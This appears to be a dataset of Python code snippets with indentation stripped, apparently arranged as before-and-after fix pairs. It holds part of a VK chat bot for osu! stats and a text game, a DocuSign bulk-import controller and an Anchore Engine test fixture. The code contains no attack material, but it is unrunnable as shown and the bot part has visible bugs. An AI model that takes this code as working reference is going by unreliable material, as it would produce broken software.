if event.text.split()[0] in ["o!change", "o!c"]:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=osucommands.change(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["change"])
if event.text.split()[0] in ["o!reg", "o!register"]:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=osucommands.register(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["register"])
if event.text.startswith("o!changeavatar"):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=osc.changeAvatar())
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["changeavatar"])
if event.text.startswith("o!me"):
if len(event.text.split()) == 1:
user = osc.me()
if type(user) == dict:
onUpload = upload.photo_messages(user["avatarPath"])[0]
if user["username"].lower().endswith("s"):
user["username"] += "'"
else:
user["username"] += "'s"
msg = f"""{user["username"]} profile
PP: {user["pp"]}
Accuracy: {user["acc"]}%
Level: {user["level"]}
Global Rank / Country Rank: #{user["rank"]} / #{user["countryrank"]} ({user["country"]})
{user["playcount"]} plays total
Hits: {user["x300"]} x300 | {user["x100"]} x100 | {user["x50"]} x50
SS/SSH ranks: {user["SS"]} / {user["SSH"]}
S/SH ranks: {user["S"]} / {user["SH"]}
A ranks: {user["A"]}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg,
attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
else:
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["me"])
if event.text.startswith("!test"):
if len(event.text.split()) >= 2:
print(event.text.split())
else:
vk.messages.send(random_id=0, user_id=uid, message='n')
if event.text.startswith('~ping'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message='понг блядь')
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp['pingS'])
if event.text.startswith('~shutdown'):
if event.user_id == cid:
vk.messages.send(random_id=0, user_id=uid, message='Shutting down...')
raise SystemExit
if event.text.startswith('~restart'):
if event.user_id == cid:
if ingame:
for i in ingame:
ingame.remove(i)
com.mapLeave(i)
vk.messages.send(random_id=0, user_id=i, message="Your account has been forcibly removed from the session.")
vk.messages.send(random_id=0, user_id=uid, message=f"{vk.users.get(user_ids=i)[0]['first_name']} был удалён из сессии")
vk.messages.send(random_id=0, user_id=uid, message='Restarting bot...')
print("Started restart")
with open('.rsttemp', 'w') as f:
f.write(str(event.user_id))
os.execv(sys.executable, ['python'] + sys.argv)
if event.text.startswith('~reload'):
if event.user_id == cid:
if len(event.text.split()) == 2:
if event.text.split()[1] in ["sh", "com", "ver", "utils"]:
if event.text.split()[1] == "sh":
reload(sh)
if event.text.split()[1] == "com":
reload(com)
if event.text.split()[1] == "ver":
reload(ver)
if event.text.split()[1] == "utils":
reload(utils)
vk.messages.send(random_id=0, user_id=uid, message=f"Module \"{event.text.split()[1]}\" reloaded")
else:
vk.messages.send(random_id=0, user_id=uid, message="~reload (module)")
if event.text.startswith('~ruleofinternet') or event.text.startswith('~rofi'):
if len(event.text.split()) == 2:
if event.text.split()[1] == 'random':
randrule = str(random.randint(1, 49))
vk.messages.send(random_id=0, user_id=uid, message=com.rofi(randrule))
else:
vk.messages.send(random_id=0, user_id=uid, message=com.rofi(event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp['ruleofinternet'])
if event.text.startswith('!register'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.register(uid, userName, userLastName))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp["register"])
if event.text.startswith('!showinv'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.showInventory(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp["showinv"])
if event.text.startswith('!unregister'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.delete(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['unregister'])
if event.text.startswith('~secretkitty'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message="""
⊂_ヽ
\\ Λ_Λ
\( ˇωˇ)
⌒ヽ
/ へ\
/ / \\
レ ノ ヽ_つ
/ /
/ /|
( (ヽ
| |、\
| 丿 \ ⌒)
| | ) /
`ノ ) Lノ
(_/
""")
if event.text.startswith('!version'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=f"Account version: v.{ut.checkVersion(uid)}\nLatest version: v.{ver.latestVersion}")
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['version'])
if event.text.startswith('!upgrade'):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=ver.upgradeToLatest(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['upgrade'])
if event.text.startswith('!enter'):
if len(event.text.split()) == 1:
if uid not in ingame:
ingame.append(uid)
com.playerToMap(uid)
vk.messages.send(random_id=0, user_id=uid, message="Account is now in session")
else:
vk.messages.send(random_id=0, user_id=uid, message="U're already in session")
else:
vk.messages.send(random_id=0, userid=uid, message=comhelp['enter'])
if event.text.startswith("!actlist"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.actions(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp["actlist"])
else:
vk.messages.send(random_id=27, user_id=uid, message="You must be in session")
if event.text.startswith("!move"):
if uid in ingame:
if len(event.text.split()) == 2:
direction = event.text.split()[1].lower()
if direction in ['right', 'left', 'up', 'down']:
vk.messages.send(random_id=0, user_id=uid, message=sh.move(uid, direction))
else:
vk.messages.send(random_id=0, user_id=uid, message="Wrong direction, enter one of the 'right', 'left', 'up', 'down'")
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("!open"):
if ut.checkVersion(uid) >= ver.latestVersion:
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=sh.openChest(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['open'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
if event.text.startswith("!description"):
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.itemDesc(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['description'])
if event.text.startswith("!action"):
if uid in ingame:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=sh.itemAction(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['action'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("!itemlist"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.showShopList(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['itemlist'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("!buy"):
if ut.checkVersion(uid) >= ver.latestVersion:
if uid in ingame:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.buyItem(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['buy'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
if event.text.startswith("!sell"):
if ut.checkVersion(uid) >= ver.latestVersion:
if uid in ingame:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.sellItem(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['sell'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
if event.text.startswith("!tradeinv"):
if ut.checkVersion(uid) >= ver.latestVersion:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.showTradeInventory(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['tradeinv'])
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command")
if event.text.startswith("!tileplayers"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.playersOnTile(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['tileplayers'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("/pm"):
if uid in ingame:
if len(event.text.split()) > 2:
if int(event.text.split()[1]) not in ingame:
vk.messages.send(random_id=0, user_id=uid, message="User isn't in game")
else:
if ut.inFriends(uid, event.text.split()[1]):
vk.messages.send(random_id=0, user_id=event.text.split()[1], message=f"{com.searchByID(uid)}(PM): {' '.join(event.text.split()[2:])}")
vk.messages.send(random_id=0, user_id=uid, message=f"{com.searchByID(uid)}(PM): {event.text.split()[2:]}")
else:
vk.messages.send(random_id=0, user_id=uid, message="This user isn't in your friendlist")
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['pm'])
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("/sendmoney"):
if len(event.text.split()) == 3:
vk.messages.send(random_id=0, user_id=uid, message=com.sendMoney(uid, event.text.split()[1], event.text.split()[2]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['sendmoney'])
if event.text.startswith("/sendgift"):
if ut.isExist(uid):
if ut.checkVersion(uid) >= ver.latestVersion:
if len(event.text.split()) >= 3:
if ut.checkVersion(event.text.split()[1]) >= 51:
vk.messages.send(random_id=0, user_id=uid, message=com.sendGift(uid, event.text.split()[1], event.text.split()[2], event.text.split()[3:]))
else:
vk.messages.send(random_id=0, user_id=uid, message="This account have version lower than 51 or not registered")
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['sendgift'])
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command.")
else:
vk.messages.send(random_id=0, user_id=uid, message="Register first")
if event.text.startswith("/acceptgift"):
if ut.isExist(uid):
if ut.checkVersion(uid) >= ver.latestVersion:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.acceptGift(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['acceptgift'])
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command.")
else:
vk.messages.send(random_id=0, user_id=uid, message="Register first")
if event.text.startswith("/rejectgift"):
if isExist(uid):
if ut.checkVersion(uid) >= ver.latestVersion:
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.rejectGift(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['rejectgift'])
else:
vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '~upgrade' command.")
else:
vk.messages.send(random_id=0, user_id=uid, message="Register first")
if event.text.startswith("/chat"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message="You don't wrote the message")
else:
sh.chat(uid, event.text.split()[1:], False)
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("/me"):
if uid in ingame:
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message="You don't wrote the message")
else:
sh.chat(uid, event.text.split()[1:], True)
else:
vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
if event.text.startswith("/addfriend"):
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.addFriend(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['addfriend'])
if event.text.startswith("/denyrequest"):
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.denyFriendRequest(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['denyrequest'])
if event.text.startswith("/friendlist"):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.friendList(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['friendlist'])
if event.text.startswith("/removefriend"):
if len(event.text.split()) == 2:
vk.messages.send(random_id=0, user_id=uid, message=com.removeFriend(uid, event.text.split()[1]))
else:
vk.messages.send(random_id=0, user_id=uid, message=sochelp['removefriend'])
if event.text.startswith('!leave'):
if len(event.text.split()) == 1:
if uid in ingame:
ingame.remove(uid)
com.mapLeave(uid)
vk.messages.send(random_id=0, user_id=uid, message="Account removed from session")
else:
vk.messages.send(random_id=0, user_id=uid, message="Account isn't in session")
else:
vk.messages.send(random_id=0, user_id=uid, message=comhelp['leave'])
if event.text.startswith("!save"):
if len(event.text.split()) == 1:
vk.messages.send(random_id=0, user_id=uid, message=com.save(uid))
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['save'])
if event.text.startswith('!whereami'):
if len(event.text.split()) == 1:
kurwa = com.getCoords(uid)
vk.messages.send(random_id=0, user_id=uid, message=f"You're on ({kurwa[0]};{kurwa[1]}) (x;y)")
else:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp['whereami'])
if event.text.startswith("~!!dropsession"):
if event.user_id == cid:
if ingame:
for i in ingame:
ingame.remove(i)
com.mapLeave(i)
vk.messages.send(random_id=0, user_id=i, message="Your account has been forcibly removed from the session.")
vk.messages.send(random_id=0, user_id=uid, message=f"{vk.users.get(user_ids=i)[0]['first_name']} был удалён из сессии")
else:
vk.messages.send(random_id=0, user_id=uid, message='Никого в сессии нет, еблан')
if event.text.split()[0] in ["~", "~help"]:
if len(event.text.split()) == 1:
msg = f"""These commands have the prefix "~":
help: {comhelp['help']}
osuhelp: {comhelp['osuhelp']}
gamehelp: {comhelp['gamehelp']}
socialhelp: {comhelp['socialhelp']}
ping: {comhelp['ping']}
uploadmany: {comhelp['uploadmany']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
elif len(event.text.split()) == 2:
if event.text.split()[1] in comhelp:
vk.messages.send(random_id=0, user_id=uid, message=comhelp[event.text.split()[1]])
if int(event.text.split()[1]) in [2]:
if int(event.text.split()[1]) == 2:
msg = f"""~help page 2:
description: {comhelp['description']}
ruleofinternet: {comhelp['ruleofinternet']}
loli: {comhelp['loli']}
uploadone: {comhelp['upload']}
"""
else:
vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~help")
if event.text.split()[0] in ["!", "~gamehelp", "!help"]:
if len(event.text.split()) == 1:
msg = f"""These commands have the prefix "!"
register: {gamehelp['register']}
unregister: {gamehelp['unregister']}
version: {gamehelp['version']}
upgrade: {gamehelp['upgrade']}
enter: {gamehelp['enter']}
leave: {gamehelp['leave']}
whereami: {gamehelp['whereami']}
move: {gamehelp['move']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
if len(event.text.split()) == 2:
if event.text.split()[1] in gamehelp:
vk.messages.send(random_id=0, user_id=uid, message=gamehelp[event.text.split()[1]])
if int(event.text.split()[1]) in [2, 3]:
if int(event.text.split()[1]) == 2:
msg = f"""~gamehelp page 2:
save: {gamehelp['save']}
open: {gamehelp['open']}
showinv: {gamehelp['showinv']}
tradeinv: {gamehelp['tradeinv']}
action: {gamehelp['action']}
itemlist: {gamehelp['itemlist']}
buy: {gamehelp['buy']}
sell: {gamehelp['sell']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
if int(event.text.split()[1]) == 3:
msg = f"""~gamehelp page 3:
tileplayers: {gamehelp['tileplayers']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
else:
vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~gamehelp")
if event.text.split()[0] in ["/", "~socialhelp", "/help"]:
if len(event.text.split()) == 1:
msg = f"""These commands have the prefix "/"
chat: {sochelp['chat']}
me: {sochelp['me']}
addfriend: {sochelp['addfriend']}
removefriend: {sochelp['removefriend']}
denyrequest: {sochelp['denyrequest']}
firendlist: {sochelp['friendlist']}
sendmoney: {sochelp['sendmoney']}
sendgift: {sochelp['sendgift']}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
if len(event.text.split()) == 2:
if event.text.split()[1] in sochelp:
vk.messages.send(random_id=0, user_id=uid, message=sochelp[event.text.split()[1]])
else:
vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~socialhelp")
if event.text.split()[0] in ["o!", "~osuhelp", "o!help"]:
if len(event.text.split()) == 1:
msg = f"""These commands have the prefix "o!"
pp: {osuhelp["pp"]}
register: {osuhelp["register"]}
change: {osuhelp["change"]}
recent: {osuhelp["recent"]}
me: {osuhelp["me"]}
changeavatar: {osuhelp["changeavatar"]}
"""
vk.messages.send(random_id=0, user_id=uid, message=msg)
if len(event.text.split()) == 2:
if event.text.split()[1] == "pp":
vk.messages.send(random_id=0, user_id=uid, message=osuhelp["ppextended"])
else:
if event.text.split()[1] in osuhelp and event.text.split()[1] != "pp":
vk.messages.send(random_id=0, user_id=uid, message=osuhelp[event.text.split()[1]])
else:
vk.messages.send(random_id=0, user_id=uid, message="Commands is not found. Try ~osuhelp")
except UnboundLocalError as e:
print(f"Catched a UnboundLocalError exception, restart: {e}")
continue
except TypeError as e:
print(f"Catched a TypeError exception, restart: {e}")
continue
except NameError as e:
print(f"Catched a NameError exception, restart: {e}")
continue
except KeyError as e:
print(f"Catched a KeyError exception, restart: {e}")
continue
except ZeroDivisionError:
pass
if __name__ == '__main__':
main()
|
from os import path
from docusign_admin.apis import BulkImportsApi
from flask import session, Response
import time
from app.admin.utils import create_admin_api_client, get_organization_id
from app.ds_config import DS_CONFIG
class Eg004AddUsersViaBulkImportController:
@staticmethod
def worker(self, request):
"""
Create a user list import request and
returns a list of pending and completed import requests:
1. Create the import API object
2. Getting a CSV file from a form and converting it to a string
3. Creating an import API object
4. Setting headers for creating bulk import request
5. Returns the response from the create_bulk_import_add_users_request method
"""
# Get organization ID
organization_id = get_organization_id()
# Create the export API object
# Step 2 start
api_client = create_admin_api_client(
access_token=session["ds_access_token"]
)
# Step 2 end
# Getting a CSV file from a form and saving it
uploaded_file = request.files['csv_file']
csv_folder_path = path.abspath(path.join(path.dirname(path.realpath(__file__)), "csv"))
csv_file_path = path.join(csv_folder_path, "uploaded_file.csv")
uploaded_file.save(csv_file_path)
# Creating an import API object
import_api = BulkImportsApi(api_client=api_client)
# Setting headers for creating bulk import request
header_name, header_value = "Content-Disposition", "filename=myfile.csv"
api_client.set_default_header(header_name, header_value)
# Returns the response from the create_bulk_import_add_users_request method
# Step 3 start
response = import_api.create_bulk_import_add_users_request(
organization_id,
csv_file_path
)
# Step 3 end
# Save user list import id in a client session
session['import_data_id'] = response.id
return response
@staticmethod
def get_example_csv():
"""
Creates an example of a CSV file, such as that needs to be sent to the Docusign server
"""
# Returns an example of a CSV file
return (
"AccountID,UserName,UserEmail,PermissionSet\n"
f"{session["ds_account_id"]},Example User1,exampleuser1@example.com,DS Admin\n"
f"{session["ds_account_id"]},Example User2,exampleuser2@example.com,DS Admin\n"
)
@staticmethod
def check_status():
"""Check request status"""
organization_id = get_organization_id()
api_client = create_admin_api_client(
access_token=session["ds_access_token"]
)
# Creating an import API object
import_api = BulkImportsApi(api_client=api_client)
# Step 4 start
import_results = import_api.get_bulk_user_import_request(organization_id, session['import_data_id'])
# Step 4 end
if import_results.status == "completed":
return import_results
else:
return None
| from os import path
from docusign_admin.apis import BulkImportsApi
from flask import session, Response
import time
from app.admin.utils import create_admin_api_client, get_organization_id
from app.ds_config import DS_CONFIG
class Eg004AddUsersViaBulkImportController:
@staticmethod
def worker(self, request):
"""
Create a user list import request and
returns a list of pending and completed import requests:
1. Create the import API object
2. Getting a CSV file from a form and converting it to a string
3. Creating an import API object
4. Setting headers for creating bulk import request
5. Returns the response from the create_bulk_import_add_users_request method
"""
# Get organization ID
organization_id = get_organization_id()
# Create the export API object
# Step 2 start
api_client = create_admin_api_client(
access_token=session["ds_access_token"]
)
# Step 2 end
# Getting a CSV file from a form and saving it
uploaded_file = request.files['csv_file']
csv_folder_path = path.abspath(path.join(path.dirname(path.realpath(__file__)), "csv"))
csv_file_path = path.join(csv_folder_path, "uploaded_file.csv")
uploaded_file.save(csv_file_path)
# Creating an import API object
import_api = BulkImportsApi(api_client=api_client)
# Setting headers for creating bulk import request
header_name, header_value = "Content-Disposition", "filename=myfile.csv"
api_client.set_default_header(header_name, header_value)
# Returns the response from the create_bulk_import_add_users_request method
# Step 3 start
response = import_api.create_bulk_import_add_users_request(
organization_id,
csv_file_path
)
# Step 3 end
# Save user list import id in a client session
session['import_data_id'] = response.id
return response
@staticmethod
def get_example_csv():
"""
Creates an example of a CSV file, such as that needs to be sent to the Docusign server
"""
# Returns an example of a CSV file
return (
"AccountID,UserName,UserEmail,PermissionSet\n"
f"{session['ds_account_id']},Example User1,exampleuser1@example.com,DS Admin\n"
f"{session['ds_account_id']},Example User2,exampleuser2@example.com,DS Admin\n"
)
@staticmethod
def check_status():
"""Check request status"""
organization_id = get_organization_id()
api_client = create_admin_api_client(
access_token=session["ds_access_token"]
)
# Creating an import API object
import_api = BulkImportsApi(api_client=api_client)
# Step 4 start
import_results = import_api.get_bulk_user_import_request(organization_id, session['import_data_id'])
# Step 4 end
if import_results.status == "completed":
return import_results
else:
return None
|
import json
import os
from dataclasses import dataclass
from os import path
from typing import Callable, Dict, Generator, Sequence
import pytest
import tests.functional.services.catalog.utils.api as catalog_api
import tests.functional.services.policy_engine.utils.api as policy_engine_api
from anchore_engine.db import session_scope
from anchore_engine.db.entities.catalog import CatalogImage, CatalogImageDocker
from anchore_engine.db.entities.policy_engine import (
CachedPolicyEvaluation,
CpeV2Vulnerability,
FeedMetadata,
FixedArtifact,
ImageVulnerabilitiesReport,
NvdV2Metadata,
Vulnerability,
)
from tests.functional.services.catalog.utils.utils import add_or_replace_document
from tests.functional.services.policy_engine.conftest import is_legacy_provider
from tests.functional.services.utils import http_utils
CURRENT_DIR = path.dirname(path.abspath(__file__))
ANALYSIS_FILES_DIR = path.join(CURRENT_DIR, "analysis_files")
SEED_FILE_DIR = path.join(CURRENT_DIR, "database_seed_files")
FEEDS_DATA_PATH_PREFIX = path.join("data", "v1", "service", "feeds")
EXPECTED_CONTENT = path.join(CURRENT_DIR, "expected_output")
@dataclass
class AnalysisFile:
filename: str
image_digest: str
ANALYSIS_FILES: Sequence[AnalysisFile] = [
AnalysisFile(
"alpine-test.json",
"sha256:80a31c3ce2e99c3691c27ac3b1753163214494e9b2ca07bfdccf29a5cca2bfbe",
),
AnalysisFile(
"debian-test.json",
"sha256:406413437f26223183d133ccc7186f24c827729e1b21adc7330dd43fcdc030b3",
),
AnalysisFile(
"centos-test.json",
"sha256:fe3ca35038008b0eac0fa4e686bd072c9430000ab7d7853001bde5f5b8ccf60c",
),
]
IMAGE_DIGEST_ID_MAP: Dict[str, str] = {}
@pytest.fixture(scope="package")
def add_catalog_documents(request) -> None:
"""
Adds analyzer manifests to catalog. Deletes existing manifests and images if they exist.
"""
for analysis_file in ANALYSIS_FILES:
file_path = path.join(ANALYSIS_FILES_DIR, analysis_file.filename)
with open(file_path, "r") as f:
file_contents = f.read()
analysis_document = json.loads(file_contents)
add_or_replace_document(
"analysis_data", analysis_file.image_digest, analysis_document
)
image_id = analysis_document["document"][0]["image"]["imageId"]
try:
policy_engine_api.users.delete_image(image_id)
except http_utils.RequestFailedError as err:
if err.status_code != 404:
raise err
IMAGE_DIGEST_ID_MAP[analysis_file.image_digest] = image_id
def remove_documents_and_image() -> None:
"""
Cleanup, deletes added images and analyzer manifests.
"""
for analysis_file in ANALYSIS_FILES:
catalog_api.objects.delete_document(
"analysis_data", analysis_file.image_digest
)
policy_engine_api.users.delete_image(
IMAGE_DIGEST_ID_MAP[analysis_file.image_digest]
)
request.addfinalizer(remove_documents_and_image)
@pytest.fixture(scope="package")
def ingress_image(add_catalog_documents) -> Callable[[str], http_utils.APIResponse]:
"""
Returns method that adds new image to policy engine for vulnerability scanning. Moved to fixture to reduce code duplication.
:return: METHOD that calls ingress_image for the policy engine API with the appropriate catalog URL
:rtype: Callable[[str], http_utils.APIResponse]
"""
def _ingress_image(image_digest: str) -> http_utils.APIResponse:
"""
Adds new image to policy engine for vulnerability scanning. Moved to fixture to reduce code duplication.
:param image_digest: image digest of image to ingress
:type image_digest: str
:return: api response
:rtype: http_utils.APIResponse
"""
fetch_url = f"catalog://{http_utils.DEFAULT_API_CONF["ANCHORE_API_ACCOUNT"]}/analysis_data/{image_digest}"
image_id = IMAGE_DIGEST_ID_MAP[image_digest]
return policy_engine_api.images.ingress_image(fetch_url, image_id)
return _ingress_image
@pytest.fixture(scope="package")
def ingress_all_images(ingress_image) -> None:
"""
Ingress all test images.
"""
for analysis_file in ANALYSIS_FILES:
ingress_image(analysis_file.image_digest)
@pytest.fixture(scope="session")
def image_digest_id_map() -> Dict[str, str]:
"""
:return: lookup mapping of image_digest to image_id
:rtype: Dict[str, str]
"""
return IMAGE_DIGEST_ID_MAP
SEED_FILE_TO_DB_TABLE_MAP: Dict[str, Callable] = {
"feed_data_vulnerabilities.json": Vulnerability,
"feed_data_vulnerabilities_fixed_artifacts.json": FixedArtifact,
"feed_data_nvdv2_vulnerabilities.json": NvdV2Metadata,
"feed_data_cpev2_vulnerabilities.json": CpeV2Vulnerability,
"feeds.json": FeedMetadata,
"catalog_image.json": CatalogImage,
"catalog_image_docker.json": CatalogImageDocker,
}
CATALOG_FILES = ["catalog_image.json", "catalog_image_docker.json"]
VULN_DATA_FILES = [
"feed_data_vulnerabilities.json",
"feed_data_vulnerabilities_fixed_artifacts.json",
"feed_data_nvdv2_vulnerabilities.json",
"feed_data_cpev2_vulnerabilities.json",
"feeds.json",
]
SEED_FILE_TO_METADATA_MAP: Dict[str, str] = {
"feed_data_vulnerabilities.json": "metadata_json",
"feed_data_vulnerabilities_fixed_artifacts.json": "fix_metadata",
}
def load_seed_file_rows(file_name: str) -> Generator[Dict, None, None]:
"""
Loads database seed files (json lines) and yields the json objects.
:param file_name: name of seed file to load
:type file_name: str
:return: generator yields json
:rtype: Generator[Dict, None, None]
"""
json_file = os.path.join(SEED_FILE_DIR, file_name)
with open(json_file, "rb") as f:
for line in f:
linetext = line.decode("unicode_escape").strip()
json_content = json.loads(linetext)
if file_name in SEED_FILE_TO_METADATA_MAP:
json_key = SEED_FILE_TO_METADATA_MAP[file_name]
if json_content[json_key] is not None:
json_content[json_key] = json.loads(json_content[json_key])
yield json_content
def _setup_vuln_data():
"""
Loads database seed files and bulk saves all records direclty to db
"""
with session_scope() as db:
all_records = []
files_to_seed = CATALOG_FILES.copy()
# If legacy provider, add vuln data to be seeded to files
# if grype provider, ensure the grypedb is synced
if is_legacy_provider():
files_to_seed += VULN_DATA_FILES
else:
policy_engine_api.feeds.feeds_sync(force_flush=True)
# seed data to engine db
for seed_file_name in files_to_seed:
entry_cls = SEED_FILE_TO_DB_TABLE_MAP[seed_file_name]
for db_entry in load_seed_file_rows(seed_file_name):
all_records.append(entry_cls(**db_entry))
db.bulk_save_objects(all_records)
db.flush()
@pytest.fixture(scope="package", autouse=True)
def setup_vuln_data(
request, set_env_vars, anchore_db, teardown_and_recreate_tables
) -> None:
"""
Writes database seed file content to database. This allows us to ensure consistent vulnerability results (regardless of feed sync status).
"""
tablenames = [cls.__tablename__ for cls in SEED_FILE_TO_DB_TABLE_MAP.values()]
tablenames.extend(
[CachedPolicyEvaluation.__tablename__, ImageVulnerabilitiesReport.__tablename__]
)
teardown_and_recreate_tables(tablenames)
_setup_vuln_data()
request.addfinalizer(lambda: teardown_and_recreate_tables(tablenames))
| import json
import os
from dataclasses import dataclass
from os import path
from typing import Callable, Dict, Generator, Sequence
import pytest
import tests.functional.services.catalog.utils.api as catalog_api
import tests.functional.services.policy_engine.utils.api as policy_engine_api
from anchore_engine.db import session_scope
from anchore_engine.db.entities.catalog import CatalogImage, CatalogImageDocker
from anchore_engine.db.entities.policy_engine import (
CachedPolicyEvaluation,
CpeV2Vulnerability,
FeedMetadata,
FixedArtifact,
ImageVulnerabilitiesReport,
NvdV2Metadata,
Vulnerability,
)
from tests.functional.services.catalog.utils.utils import add_or_replace_document
from tests.functional.services.policy_engine.conftest import is_legacy_provider
from tests.functional.services.utils import http_utils
CURRENT_DIR = path.dirname(path.abspath(__file__))
ANALYSIS_FILES_DIR = path.join(CURRENT_DIR, "analysis_files")
SEED_FILE_DIR = path.join(CURRENT_DIR, "database_seed_files")
FEEDS_DATA_PATH_PREFIX = path.join("data", "v1", "service", "feeds")
EXPECTED_CONTENT = path.join(CURRENT_DIR, "expected_output")
@dataclass
class AnalysisFile:
filename: str
image_digest: str
ANALYSIS_FILES: Sequence[AnalysisFile] = [
AnalysisFile(
"alpine-test.json",
"sha256:80a31c3ce2e99c3691c27ac3b1753163214494e9b2ca07bfdccf29a5cca2bfbe",
),
AnalysisFile(
"debian-test.json",
"sha256:406413437f26223183d133ccc7186f24c827729e1b21adc7330dd43fcdc030b3",
),
AnalysisFile(
"centos-test.json",
"sha256:fe3ca35038008b0eac0fa4e686bd072c9430000ab7d7853001bde5f5b8ccf60c",
),
]
IMAGE_DIGEST_ID_MAP: Dict[str, str] = {}
@pytest.fixture(scope="package")
def add_catalog_documents(request) -> None:
"""
Adds analyzer manifests to catalog. Deletes existing manifests and images if they exist.
"""
for analysis_file in ANALYSIS_FILES:
file_path = path.join(ANALYSIS_FILES_DIR, analysis_file.filename)
with open(file_path, "r") as f:
file_contents = f.read()
analysis_document = json.loads(file_contents)
add_or_replace_document(
"analysis_data", analysis_file.image_digest, analysis_document
)
